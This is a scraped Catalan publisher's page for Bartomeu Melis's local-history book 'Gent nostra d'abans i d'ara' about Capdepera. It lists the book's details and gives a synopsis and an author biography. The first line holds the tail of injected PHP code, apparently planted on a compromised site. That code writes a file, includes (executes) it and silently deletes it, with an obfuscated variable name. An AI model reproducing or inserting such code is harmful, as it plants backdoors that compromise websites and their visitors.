");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Gent nostra d'abans i d'ara
Notícies Relacionades

Ressò a la premsa illenca de la presentació a Capdepera de "Gent nostra d

26/08/2013

Ressò a la premsa illenca de la presentació a Capdepera de "Gent nostra d'abans i d'ara", de Bartomeu Melis."Arte, ocio e historia en Capdepera"  (Diario de Mallorca)  "El pueblo rev ...

Gent nostra d'abans i d'ara

Melis i Melis, «Meyme», Bartomeu

Prologuista:
Joan Cagalgante Guasp
Col·lecció:
Menjavents
Tema:
Narració breu
Pàgines:
248
PVP:
15.00
ISBN:
978-84-15432-51-7
Data d'Edició:
30/07/2013
Bartomeu Melis fa florir una part entranyable de la història de Capdepera i Cala Rajada. El lector es deixarà endur per un passat descrit amb senzillesa i rigor historiogràfic.
Sinopsi
Tomeu Melis torna amb un compendi de reportatges, articles, històries, notícies..., totes referides a gent, persones, esdeveniments que tingueren lloc al municipi de Capdepera, junt amb Cala Rajada, Canyamel i la resta del litoral, uns ja fa molts d’anys i d’altres més recents. Per a aquest segon llibre, Meyme ha seleccionat i recopilat dades i documentació variada. La vasta informació que compon Gent nostra d’abans i d’ara ha estat xuclada mitjançant les prospeccions efectuades per l’autor dins la giragonsa d’un arxiu quasi centenari, a més dels capbussaments en els viaranys de diferents publicacions periodístiques amb què el nostre protagonista ha tingut relació al llarg dels anys. L’afecció a escriure i la il·lusió de fer feina en una redacció de periòdic o a una revista han portat l'autor al lloc on ens trobam. Les seves dues dèries s’han vist, en part, complides i, ara, fruint de la jubilació, en lloc de descansar i tancar la paradeta, ha intensificat la seva immersió periodística implicant-se, encara més, en l’emmetzinament per l’escriptura. I, a més, essent pràcticament profà en les formes lingüístiques catalanes, ha compromès el seu tarannà literari per la nostra llengua.


Vegeu el trailerbook

Llegiu el sumari

Llegiu la presentació


   
Bartomeu Melis i Melis, «Meyme»
(Capdepera, 1946), va començar a escriure als 17 anys, acabat el batxillerat, i s’entusiasmava amb els diaris dels seus temps.
Va contribuir a la conversió del Diario de Mallorca en un rotatiu independent i líder en difusió de l’illa. Durant anys s’avesà a l’ofici d’elaboració de notícies de caire insular, comarcal o local.
A Edicions Documenta Balear ha publicat: Girant l’ullada cap enrere (2011) i Gent nostra d’abans i d’ara (2013)

Recomanar
Comentar
Comentaris (0)